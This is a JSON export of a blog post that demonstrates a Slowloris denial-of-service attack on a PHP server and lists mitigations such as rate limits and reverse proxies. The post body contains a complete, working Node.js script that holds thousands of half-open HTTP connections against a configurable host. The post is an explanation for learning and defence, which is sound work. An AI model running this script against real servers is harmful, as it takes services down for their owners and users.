{"id":4971,"date":"2021-09-10T04:25:33","date_gmt":"2021-09-10T04:25:33","guid":{"rendered":"https:\/\/studysection.com\/blog\/?p=4971"},"modified":"2021-09-10T06:03:54","modified_gmt":"2021-09-10T06:03:54","slug":"how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent","status":"publish","type":"post","link":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","title":{"rendered":"How Slow Loris attack using JavaScript on a PHP Server and prevent"},"content":{"rendered":"<p>SlowLoris is actually an HTTP denial of service attack that affects threaded servers. Here&#8217;s how it works:<\/p>\n<ul>\n<li>We start making a lot of HTTP requests.<\/li>\n<li>We send data from time to time (every 15 seconds) to keep connections open.<\/li>\n<li>We never close the connection until the server goes down. If the server closes the connection, we continue to create a new one.<\/li>\n<\/ul>\n<p><strong>Example<\/strong><br \/>\n<img decoding=\"async\" src=\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/php-code.png\" alt=\"PHP Server\"\/><br \/>\n<\/br><br \/>\n<strong>Code:- <\/strong><br \/>\n<code>const net = require('net')<br \/>\nconst opts = {<br \/>\n\thost: 'localhost',<br \/>\n\tport: 1234,<br \/>\n\tsockets: 2000,<br \/>\n\trespawn: false,<br \/>\n\trate: 600,<br \/>\n\tmethod: 'GET',<br \/>\n\tpath: '\/'<br \/>\n}<br \/>\nlet activeSockets = 0<br \/>\nconsole.log('Starting sockets...')<br \/>\nconst addSocket = () => {<br \/>\n\tlet socket = new net.Socket()<br \/>\n\tsocket.connect(opts.port, opts.host)<br \/>\n\tsocket.on('connect', () => {<br \/>\n\t\tsocket.write(`${opts.method} ${opts.path} HTTP\/1.1\\n`, 'ascii', () => {<br \/>\n\t\tconsole.log('Socket activated. 
(Total active: ' + activeSockets + ')')<br \/>\n\t\tactiveSockets++<br \/>\n\t\t\tsocket.write(`Host: ${opts.host}\\n`)<br \/>\n\t\t\tlet sentPacketCount = 0<br \/>\n\t\t\tconst intv = setInterval(() => {<br \/>\n\t\t\t\tif(!socket) clearInterval(intv)<br \/>\n\t\t\t\telse {<br \/>\n\t\t\t\t   socket.write(`x-header-${sentPacketCount}: ${sentPacketCount}\\n`)<br \/>\n\t\t\t\t   sentPacketCount++<br \/>\n\t\t\t\t}<br \/>\n\t\t\t}, opts.rate)<br \/>\n\t\t})<br \/>\n\t\tsocket.on('error', err => {<br \/>\n\t\t\tconsole.log('Socket error - ' + err.message)<br \/>\n\t\t\tsocket.destroy()<br \/>\n\t\t})<br \/>\n\t\tsocket.on('data', (data) => {<br \/>\n\t\t\tconsole.log('Socket data - ' + data.toString())<br \/>\n\t\t})<br \/>\n\t\tsocket.on('close', () => {<br \/>\n\t\t\tactiveSockets--<br \/>\n\t\t\tsocket = false<br \/>\n\t\t\tif (opts.respawn) {<br \/>\n\t\t\t\tconsole.log('Respawning dead socket...')<br \/>\n\t\t\t\taddSocket()<br \/>\n\t\t\t}<br \/>\n\t\t})<br \/>\n\t})<br \/>\n\tsocket.on('error', err => {<br \/>\n\t\tconsole.log(`Server down.`)<br \/>\n\t})<br \/>\n}<br \/>\nfor (let i=0;i&lt;opts.sockets; i++) {<br \/>\n\taddSocket()<br \/>\n}<\/code><br \/>\n<img decoding=\"async\" src=\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/php-code1.png\" alt=\"php-code1\" \/><br \/>\n<\/br><br \/>\nAfter a few minutes, you will see that the PHP server goes down. This is because there are too many open connections for the PHP server to handle, and it runs into memory issues.<br \/>\n<img decoding=\"async\" src=\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/php-code2.png\" alt=\"php-code2\"\/><br \/>\n<\/br><\/p>\n<h2>Why Are Slow Loris Attacks Dangerous<\/h2>\n<p>Because Slow Loris sends incomplete requests rather than malformed ones, traditional intrusion detection systems do not work well in detecting this type of DDoS attack. Slow Loris DDoS attacks can continue for a long time if they are not detected. 
Even if its sockets are closed, Slow Loris will try to re-establish the connections until it reaches its goal of shutting down the <a href=\"https:\/\/studysection.com\/blog\/selenium-standalone-server\/\">server<\/a> completely.<\/p>\n<h3>How to Protect Against a Slow Loris Attack<\/h3>\n<ol>\n<li>Define a minimum incoming data rate, and drop connections that are slower than that rate. Take care when setting this threshold, or you risk dropping legitimate connections.<\/li>\n<li>Reject \/ drop connections that use HTTP methods (verbs) not supported by the URL.<\/li>\n<li>Limit the number of connections a single IP address is allowed to attempt.<\/li>\n<li>Enforce a minimum transfer speed for each allowed connection, and a location limit.<\/li>\n<li>Restrict how long a client is allowed to stay connected.<\/li>\n<li>Use a service that acts as a reverse proxy, protecting the origin server.<\/li>\n<\/ol>\n<p><small><em>StudySection has a long list of certification exams that it offers through its online platform. The <a href=\"https:\/\/www.studysection.com\/php-programming-expert\">PHP Certification Exam<\/a> is one of the programming certifications that it provides. Whether you are new to PHP programming or you have extensive experience in PHP programming, you can get a certification according to your level. Attach a PHP certification with your resume to get the most out of job offers.<\/em><\/small><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SlowLoris is actually an HTTP denial of service attack that affects threaded servers. 
Here&#8217;s how it works: We start making<\/p>\n","protected":false},"author":1,"featured_media":4972,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[199,200],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog<\/title>\n<meta name=\"description\" content=\"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog\" \/>\n<meta property=\"og:description\" content=\"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\" \/>\n<meta property=\"og:site_name\" content=\"Blog Posts on famous people, innovations and educational topics\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/studysection\" \/>\n<meta property=\"article:published_time\" content=\"2021-09-10T04:25:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-09-10T06:03:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/JavaScript.png\" 
\/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"admin-studysection-blog\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@studysection\" \/>\n<meta name=\"twitter:site\" content=\"@studysection\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin-studysection-blog\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\"},\"author\":{\"name\":\"admin-studysection-blog\",\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/person\/db367e2c29a12d1808fb1979edb3d402\"},\"headline\":\"How Slow Loris attack using JavaScript on a PHP Server and prevent\",\"datePublished\":\"2021-09-10T04:25:33+00:00\",\"dateModified\":\"2021-09-10T06:03:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\"},\"wordCount\":342,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/studysection.com\/blog\/#organization\"},\"keywords\":[\"JavaScript\",\"php\"],\"articleSection\":[\"Learn and 
Grow\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\",\"url\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\",\"name\":\"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog\",\"isPartOf\":{\"@id\":\"https:\/\/studysection.com\/blog\/#website\"},\"datePublished\":\"2021-09-10T04:25:33+00:00\",\"dateModified\":\"2021-09-10T06:03:54+00:00\",\"description\":\"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.\",\"breadcrumb\":{\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/studysection.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How Slow Loris attack using JavaScript on a PHP Server and prevent\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/studysection.com\/blog\/#website\",\"url\":\"https:\/\/studysection.com\/blog\/\",\"name\":\"Blog Posts on famous people, innovations and educational 
topics\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/studysection.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/studysection.com\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/studysection.com\/blog\/#organization\",\"name\":\"StudySection\",\"url\":\"https:\/\/studysection.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/10\/studySection-logo.png\",\"contentUrl\":\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/10\/studySection-logo.png\",\"width\":920,\"height\":440,\"caption\":\"StudySection\"},\"image\":{\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/studysection\",\"https:\/\/twitter.com\/studysection\",\"https:\/\/www.instagram.com\/study.section\/\",\"https:\/\/www.linkedin.com\/company\/studysection\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/person\/db367e2c29a12d1808fb1979edb3d402\",\"name\":\"admin-studysection-blog\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/054ac87a6874df1932004239cd8eab36?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/054ac87a6874df1932004239cd8eab36?s=96&d=mm&r=g\",\"caption\":\"admin-studysection-blog\"},\"url\":\"https:\/\/studysection.com\/blog\/author\/admin-studysection-blog\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog","description":"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","og_locale":"en_US","og_type":"article","og_title":"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog","og_description":"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.","og_url":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","og_site_name":"Blog Posts on famous people, innovations and educational topics","article_publisher":"https:\/\/www.facebook.com\/studysection","article_published_time":"2021-09-10T04:25:33+00:00","article_modified_time":"2021-09-10T06:03:54+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/JavaScript.png","type":"image\/png"}],"author":"admin-studysection-blog","twitter_card":"summary_large_image","twitter_creator":"@studysection","twitter_site":"@studysection","twitter_misc":{"Written by":"admin-studysection-blog","Est. 
reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#article","isPartOf":{"@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/"},"author":{"name":"admin-studysection-blog","@id":"https:\/\/studysection.com\/blog\/#\/schema\/person\/db367e2c29a12d1808fb1979edb3d402"},"headline":"How Slow Loris attack using JavaScript on a PHP Server and prevent","datePublished":"2021-09-10T04:25:33+00:00","dateModified":"2021-09-10T06:03:54+00:00","mainEntityOfPage":{"@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/"},"wordCount":342,"commentCount":0,"publisher":{"@id":"https:\/\/studysection.com\/blog\/#organization"},"keywords":["JavaScript","php"],"articleSection":["Learn and Grow"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","url":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","name":"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog","isPartOf":{"@id":"https:\/\/studysection.com\/blog\/#website"},"datePublished":"2021-09-10T04:25:33+00:00","dateModified":"2021-09-10T06:03:54+00:00","description":"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory 
issues.","breadcrumb":{"@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/studysection.com\/blog\/"},{"@type":"ListItem","position":2,"name":"How Slow Loris attack using JavaScript on a PHP Server and prevent"}]},{"@type":"WebSite","@id":"https:\/\/studysection.com\/blog\/#website","url":"https:\/\/studysection.com\/blog\/","name":"Blog Posts on famous people, innovations and educational topics","description":"","publisher":{"@id":"https:\/\/studysection.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/studysection.com\/blog\/?s={search_term_string}"},"query-input":"required 
name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/studysection.com\/blog\/#organization","name":"StudySection","url":"https:\/\/studysection.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/studysection.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/10\/studySection-logo.png","contentUrl":"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/10\/studySection-logo.png","width":920,"height":440,"caption":"StudySection"},"image":{"@id":"https:\/\/studysection.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/studysection","https:\/\/twitter.com\/studysection","https:\/\/www.instagram.com\/study.section\/","https:\/\/www.linkedin.com\/company\/studysection"]},{"@type":"Person","@id":"https:\/\/studysection.com\/blog\/#\/schema\/person\/db367e2c29a12d1808fb1979edb3d402","name":"admin-studysection-blog","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/studysection.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/054ac87a6874df1932004239cd8eab36?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/054ac87a6874df1932004239cd8eab36?s=96&d=mm&r=g","caption":"admin-studysection-blog"},"url":"https:\/\/studysection.com\/blog\/author\/admin-studysection-blog\/"}]}},"views":465,"_links":{"self":[{"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/posts\/4971"}],"collection":[{"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/comments?post=4971"}],"version-history":[{"count":5,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/posts\/4971\/revision
s"}],"predecessor-version":[{"id":4980,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/posts\/4971\/revisions\/4980"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/media\/4972"}],"wp:attachment":[{"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/media?parent=4971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/categories?post=4971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/tags?post=4971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}